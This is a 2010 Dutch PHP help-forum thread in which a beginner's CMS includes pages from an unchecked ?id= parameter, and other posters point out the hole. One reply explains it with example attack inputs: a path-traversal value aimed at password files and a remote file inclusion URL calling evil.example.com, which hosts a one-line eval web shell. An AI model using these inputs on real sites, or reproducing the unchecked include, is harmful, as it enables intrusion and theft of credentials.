het php?id= ding probleem

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Ray de graaf

ray de graaf

13/07/2010 23:22:59
Quote Anchor link
hallo,

ik ben ray em ik heb het het webdesign weer opgepakt, was eerder grafisch vormgever maar zit nu al wat jaartjes in dienst. heb ooit een start gemaakt aan php maar ben nog lerende.. ik mis het klooien met scripten en dingen ontwikkelen dus ben een siteje aan het maken..

ik heb een cms systeem geupload en die draait prima:

www.bnh-beauty.nl/ray/cms2/index.php

daar heb j links main navigation met wat links. nu heb ik er 2 zelf bij gemaakt namelijk de laatste 2

nu krijg ik het niet voor elkaar om die paginas te openen in waar de andere ook openen, gewoon naast het menu de 2e 3e en 4e links hebben achter de link ?id=blablabla staan

de vraag hoe krijg ik het nou voorelkaar dat het geopent word naast me menu?

bedankt ray

Toevoeging op 29/07/2010 11:52:31:

hallo,

ik loop weer tegen een probleem aan

ik heb een formuliertje gemaakt die wat gegevens stuurt naar een db, als ik dit bestand rechtstreekst benader dan werkt hij gewoon..

nu heb ik het bestand via een cms in een menu gezet, het formulier word weergegeven maar wanneer ik op verzende druk gebeurd er niks ook geen melding dat het gelukt is of juist niet.

url: http://www.bnh-beauty.nl/ray/cms2/modelzoeken.php >> werkt wel
url: http://www.bnh-beauty.nl/ray/cms2/index.php?id=modelzoeken >> werkt niet

hoe kan ik dit nou oplossen ??
 
PHP hulp

PHP hulp

11/05/2024 20:04:44
 
Ray de graaf

ray de graaf

13/07/2010 23:30:01
Quote Anchor link
Heb het ondekt! gewoon ?id=kamerzoeken er en klaar...

thnks
 
Mark L

Mark L

13/07/2010 23:31:52
Quote Anchor link
Jouw links verwijzen naar je eigen pagina's. Als je kijkt naar de 'bestaande' links, verwijzen die naar index.php?id=modules/download

De index.php opent de pagina's zelf.
Je moet dus naar de index.php gaan en kijken wat deze met de $_GET['id'] variabele doet.

Voor zover ik het zie, word de $_GET['id'] gepakt, er een '.php' achter geplakt en ge-include. Als dit zo is, dan is dit niet heel erg veilig.

Uiteraard ben ik te laat.
Gewijzigd op 13/07/2010 23:32:32 door Mark L
 
Pim -

Pim -

14/07/2010 03:13:53
Quote Anchor link
Daar zit vast (en hopelijk) nog wel een check aan vast.
 
Mitchel V

Mitchel V

14/07/2010 03:44:30
Quote Anchor link
id = nummer checken op nummer: is_numeric
 
Pim -

Pim -

14/07/2010 04:06:05
Quote Anchor link
Nooit is_numeric gebruiken, floats en hexadecimalen ed komen daardoorheen. Gebruik ctype_digit of een int typecast ($int = (int) $string).
Maar ik had het tegen Mark L
Gewijzigd op 14/07/2010 04:07:27 door Pim -
 
Chris -

Chris -

14/07/2010 08:37:59
Quote Anchor link
Mitchel V op 14/07/2010 03:44:30:
id = nummer checken op nummer: is_numeric


ID hoeft niet perse een nummer te zijn hoor ;-)

Komt vaak genoeg voor dat een ID een combinatie van cijfers en letters is...
 
Ray de graaf

ray de graaf

15/07/2010 08:13:39
Quote Anchor link
bedankt voor de reacties,,

volgens mij word het menu hier opgebouwd:

if(!isset($_GET['id']) && !isset($_GET['login']))
{
include("news.php");
}

if(isset($_GET['id']))
{
$id = $_GET['id'];
$acces = $_GET['login'];

if(file_exists("$id.php"))
{
include("$id.php");
}
elseif(!file_exists("$id.php"))
{
echo'
<table class="main" cellspacing="1" cellpadding="4" width="100%">
<tr class="head"><td class="head">'.$language['Error'].'</td></tr>
<tr><td class="con1">'.$language['Error page'].'</td></tr>
</table>';
}
}

if(isset($_GET['login']))
{
echo '
<table class="main" cellspacing="1" cellpadding="4">
<tr class="head"><td class="head">'.$language['Error'].'</td></tr>
<tr><td class="con1">'.$language['Error acces'].'</td></tr>
</table>';
}


wat ik ervan begrijp doet hij inderdaad de variable ophalen en daar .php achter..
dit moet isk dus veranderen in het bovengenoemde?

ray
 
P Lekensteyn

P Lekensteyn

15/07/2010 10:05:43
Quote Anchor link
Controleer of de naam wel geldig is.
Als je nu iets als ?id=index invult zal het oneindig vaak zichzelf openen.
Erger wordt het als je dit doet: ?id=../../gevoelige/informatie/buiten/de/webroot/wachtwoorden
Nog erger: ?id=http://evil.example.com/index&c=phpinfo();
Met in http://evil.example.com/index.php:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<?php eval($_GET['c']); ?>

In zo'n geval wordt phpinfo(); uitgevoerd,
Ik zou zeggen, controleer welke bestanden included mogen worden.
 
Ray de graaf

ray de graaf

29/07/2010 11:57:58
Quote Anchor link
hallo,

ik loop tegen een probleem aan

ik heb een formuliertje gemaakt die wat gegevens stuurt naar een db, als ik dit bestand rechtstreekst benader dan werkt hij gewoon..

nu heb ik het bestand via een cms in een menu gezet, het formulier word weergegeven maar wanneer ik op verzende druk gebeurd er niks ook geen melding dat het gelukt is of juist niet.

url: http://www.bnh-beauty.nl/ray/cms2/modelzoeken.php >> werkt wel
url: http://www.bnh-beauty.nl/ray/cms2/index.php?id=modelzoeken >> werkt niet

hoe kan ik dit nou oplossen ??

ray
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.